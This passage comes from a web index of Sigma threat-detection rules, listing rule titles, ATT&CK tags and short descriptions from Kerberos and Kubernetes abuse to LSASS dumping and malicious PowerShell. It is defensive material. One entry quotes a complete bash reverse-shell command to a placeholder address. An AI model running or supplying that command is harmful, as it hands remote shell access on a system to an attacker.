    Aug 12, 2024 · attack.t1059.002 attack.t1059.007 attack.execution

    Detects possible malicious execution of JXA in-memory via OSAScript

  • Kavremover Dropped Binary LOLBIN Usage

    Aug 12, 2024 · attack.defense-evasion attack.t1127

    Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.

  • KDC RC4-HMAC Downgrade CVE-2022-37966

    Aug 12, 2024 · attack.privilege-escalation

    Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation

  • Kerberos Manipulation

    Aug 12, 2024 · attack.credential-access attack.t1212

    Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.

  • Kerberos Network Traffic RC4 Ticket Encryption

    Aug 12, 2024 · attack.credential-access attack.t1558.003

    Detects Kerberos TGS requests using RC4 encryption, which may be indicative of kerberoasting

  • KrbRelayUp Service Installation

    Aug 12, 2024 · attack.privilege-escalation attack.t1543

    Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)

  • Kubernetes Admission Controller Modification

    calendar Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007  ·
    Share on: twitter facebook linkedin copy

    Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.


    Read More
  • Kubernetes CronJob/Job Modification

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.execution

    Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.

  • Kubernetes Rolebinding Modification

    Aug 12, 2024 · attack.privilege-escalation

    Detects when a Kubernetes Rolebinding is created or modified.

  • Kubernetes Secrets Modified or Deleted

    Aug 12, 2024 · attack.credential-access

    Detects when Kubernetes Secrets are modified or deleted.

  • Launch-VsDevShell.PS1 Proxy Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1216.001

    Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.

  • Lazarus Group Activity

    Aug 12, 2024 · attack.g0032 attack.execution attack.t1059 detection.emerging-threats

    Detects different process execution behaviors as described in various threat reports on Lazarus group activity

  • Lazarus System Binary Masquerading

    Aug 12, 2024 · attack.defense-evasion attack.t1036.005 detection.emerging-threats

    Detects binaries used by the Lazarus group which use system names but are executed and launched from a non-default location

  • Legitimate Application Dropped Archive

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects programs on a Windows system that should not write an archive to disk

  • Legitimate Application Dropped Executable

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects programs on a Windows system that should not write executables to disk

  • Legitimate Application Dropped Script

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects programs on a Windows system that should not write scripts to disk

  • Leviathan Registry Key Activity

    Aug 12, 2024 · attack.persistence attack.t1547.001 detection.emerging-threats

    Detects a registry key used by the Leviathan APT in a Malaysia-focused campaign

  • Linux Base64 Encoded Pipe to Shell

    Aug 12, 2024 · attack.defense-evasion attack.t1140

    Detects a suspicious process command line that uses base64 encoded input for execution with a shell

  • Linux Base64 Encoded Shebang In CLI

    Aug 12, 2024 · attack.defense-evasion attack.t1140

    Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

  • Linux Capabilities Discovery

    Aug 12, 2024 · attack.collection attack.privilege-escalation attack.t1123 attack.t1548

    Detects attempts to discover files with the setuid/setgid capability set on them, which would allow an adversary to escalate their privileges.

  • Linux Command History Tampering

    Aug 12, 2024 · attack.defense-evasion attack.t1070.003

    Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".

  • Linux Crypto Mining Indicators

    Aug 12, 2024 · attack.impact attack.t1496

    Detects command line parameters or strings often used by crypto miners

  • Linux Crypto Mining Pool Connections

    Aug 12, 2024 · attack.impact attack.t1496

    Detects process connections to a Monero crypto mining pool

  • Linux Doas Conf File Creation

    Aug 12, 2024 · attack.privilege-escalation attack.t1548

    Detects the creation of the doas.conf file on a Linux host.

  • Linux Doas Tool Execution

    Aug 12, 2024 · attack.privilege-escalation attack.t1548

    Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.

  • Linux Keylogging with Pam.d

    Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1056.001

    Detects attempts to enable auditing of TTY input

  • Linux Network Service Scanning - Auditd

    Aug 12, 2024 · attack.discovery attack.t1046

    Detects enumeration of local or remote network services.

  • Linux Package Uninstall

    Aug 12, 2024 · attack.defense-evasion attack.t1070

    Detects Linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

  • Linux Recon Indicators

    Aug 12, 2024 · attack.reconnaissance attack.t1592.004 attack.credential-access attack.t1552.001

    Detects events with patterns found in commands used for reconnaissance on Linux systems

  • Linux Remote System Discovery

    Aug 12, 2024 · attack.discovery attack.t1018

    Detects the enumeration of other remote systems.

  • Linux Reverse Shell Indicator

    Aug 12, 2024 · attack.execution attack.t1059.004

    Detects bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

  • Linux Shell Pipe to Shell

    Aug 12, 2024 · attack.defense-evasion attack.t1140

    Detects a suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

  • Linux Webshell Indicators

    Aug 12, 2024 · attack.persistence attack.t1505.003

    Detects suspicious sub-processes of web server processes

  • Live Memory Dump Using Powershell

    Aug 12, 2024 · attack.t1003

    Detects usage of a PowerShell command to dump the live memory of a Windows machine

  • LiveKD Driver Creation

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation

    Detects the creation of the LiveKD driver, which is used for live kernel debugging

  • LiveKD Driver Creation By Uncommon Process

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation

    Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

  • LiveKD Kernel Memory Dump File Created

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation

    Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

  • LoadBalancer Security Group Modification

    Aug 12, 2024 · attack.initial-access attack.t1190

    Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate a misconfiguration allowing more traffic into the system than required, or that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.

  • Loading Diagcab Package From Remote Path

    Aug 12, 2024 · attack.execution

    Detects loading of diagcab packages from a remote path, as seen in the DogWalk vulnerability

  • Loading of Kernel Module via Insmod

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1547.006

    Detects loading of kernel modules with the insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel on demand. Adversaries may use LKMs to obtain persistence within the system or elevate privileges.

  • Local Accounts Discovery

    Aug 12, 2024 · attack.discovery attack.t1033 attack.t1087.001

    Detects local account and system owner/user discovery using operating system utilities

  • Local File Read Using Curl.EXE

    Aug 12, 2024 · attack.execution

    Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.

  • Local Groups Discovery - Linux

    Aug 12, 2024 · attack.discovery attack.t1069.001

    Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings.

  • Local Groups Discovery - MacOs

    Aug 12, 2024 · attack.discovery attack.t1069.001

    Detects enumeration of local system groups

  • Local Groups Reconnaissance Via Wmic.EXE

    Aug 12, 2024 · attack.discovery attack.t1069.001

    Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

  • Local Network Connection Initiated By Script Interpreter

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.

  • Local Privilege Escalation Indicator TabTip

    Aug 12, 2024 · attack.execution attack.t1557.001

    Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode

  • Local System Accounts Discovery - MacOs

    Aug 12, 2024 · attack.discovery attack.t1087.001

    Detects enumeration of local system accounts on MacOS

  • Local User Creation

    Aug 12, 2024 · attack.persistence attack.t1136.001

    Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.

  • Locked Workstation

    Aug 12, 2024 · attack.impact

    Detects locked workstation session events that occur automatically after a standard period of inactivity.

  • LockerGoga Ransomware Activity

    Aug 12, 2024 · attack.impact attack.t1486 detection.emerging-threats

    Detects LockerGoga ransomware activity via specific command line.

  • Log4j RCE CVE-2021-44228 Generic

    Aug 12, 2024 · attack.initial-access attack.t1190 detection.emerging-threats

    Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)

  • Log4j RCE CVE-2021-44228 in Fields

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-44228 detection.emerging-threats

    Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)

  • Logged-On User Password Change Via Ksetup.EXE

    Aug 12, 2024 · attack.execution

    Detects a password change for the logged-on user via "ksetup.exe"

  • Logging Configuration Changes on Linux Host

    Aug 12, 2024 · attack.defense-evasion attack.t1562.006

    Detects changes to syslog daemon configuration files

  • Login to Disabled Account

    Aug 12, 2024 · attack.initial-access attack.t1078.004

    Detects failed attempts to sign in to disabled accounts.

  • Logon from a Risky IP Address

    Aug 12, 2024 · attack.initial-access attack.t1078

    Detects when Microsoft Cloud App Security reports that a user signed into your sanctioned apps from a risky IP address.

  • LOL-Binary Copied From System Directory

    Aug 12, 2024 · attack.defense-evasion attack.t1036.003

    Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another location on disk in order to bypass detections based on locations.

  • LOLBAS Data Exfiltration by DataSvcUtil.exe

    Aug 12, 2024 · attack.exfiltration attack.t1567

    Detects when a user performs data exfiltration by using DataSvcUtil.exe

  • Lolbas OneDriveStandaloneUpdater.exe Proxy Download

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json

  • LOLBIN Execution From Abnormal Drive

    Aug 12, 2024 · attack.defense-evasion

    Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.

  • Lolbin Runexehelper Use As Proxy

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects usage of the "runexehelper.exe" binary as a proxy to launch other programs

  • Lolbin Unregmp2.exe Use As Proxy

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"

  • LSA PPL Protection Disabled Via Reg.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1562.010

    Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process

  • LSASS Access Detected via Attack Surface Reduction

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects access to the LSASS process

  • LSASS Access From Non System Account

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects potential mimikatz-like tools accessing LSASS from a non-system account

  • LSASS Access From Potentially White-Listed Processes

    Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002

    Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference

  • LSASS Dump Keyword In CommandLine

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

  • Lsass Full Dump Request Via DumpType Registry Settings

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects the setting of the "DumpType" registry value to "2", which stands for a "Full Dump". Techniques such as LSASS Shtinkering require this value to be "2" in order to dump LSASS.

  • LSASS Memory Access by Tool With Dump Keyword In Name

    Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002

    Detects LSASS process access requests from a source process with the "dump" keyword in its image name.

  • Lsass Memory Dump via Comsvcs DLL

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.

  • LSASS Process Dump Artefact In CrashDumps Folder

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.

  • MacOS Emond Launch Daemon

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1546.014

    Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.

  • MacOS Network Service Scanning

    Aug 12, 2024 · attack.discovery attack.t1046

    Detects enumeration of local or remote network services.

  • Macos Remote System Discovery

    Aug 12, 2024 · attack.discovery attack.t1018

    Detects the enumeration of other remote systems.

  • MacOS Scripting Interpreter AppleScript

    Aug 12, 2024 · attack.execution attack.t1059.002

    Detects execution of AppleScript, the macOS scripting language.

  • Macro Enabled In A Potentially Suspicious Document

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    Detects registry changes to Office trust records where the path is located in a potentially suspicious location

  • Mailbox Export to Exchange Webserver

    Aug 12, 2024 · attack.persistence attack.t1505.003

    Detects a successful export of an Exchange mailbox to an untypical directory or with an .aspx name suffix, which can be used to place a webshell, or the role assignment needed for it

  • Malicious Base64 Encoded PowerShell Keywords in Command Lines

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects base64 encoded strings used in hidden malicious PowerShell command lines

  • Malicious IP Address Sign-In Failure Rate

    Aug 12, 2024 · attack.t1090 attack.command-and-control

    Indicates sign-in from a malicious IP address based on high failure rates.

  • Malicious IP Address Sign-In Suspicious

    Aug 12, 2024 · attack.t1090 attack.command-and-control

    Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.

  • Malicious Named Pipe Created

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055

    Detects the creation of a named pipe seen used by known APTs or malware.

  • Malicious Nishang PowerShell Commandlets

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects Commandlet names and arguments from the Nishang exploitation framework

  • Malicious PE Execution by Microsoft Visual Studio Debugger

    Aug 12, 2024 · attack.t1218 attack.defense-evasion

    There is an option for the MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch a specified executable and attach a debugger. This option may be used by adversaries to execute malicious code via a signed, verified binary. The debugger is installed alongside the Microsoft Visual Studio package.

  • Malicious PowerShell Commandlets - ScriptBlock

    Aug 12, 2024 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001

    Detects Commandlet names from well-known PowerShell exploitation frameworks

  • Malicious PowerShell Keywords

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects keywords from well-known PowerShell exploitation frameworks

  • Malicious ShellIntel PowerShell Commandlets

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects Commandlet names from ShellIntel exploitation scripts.

  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure

    Aug 12, 2024 · attack.privilege-escalation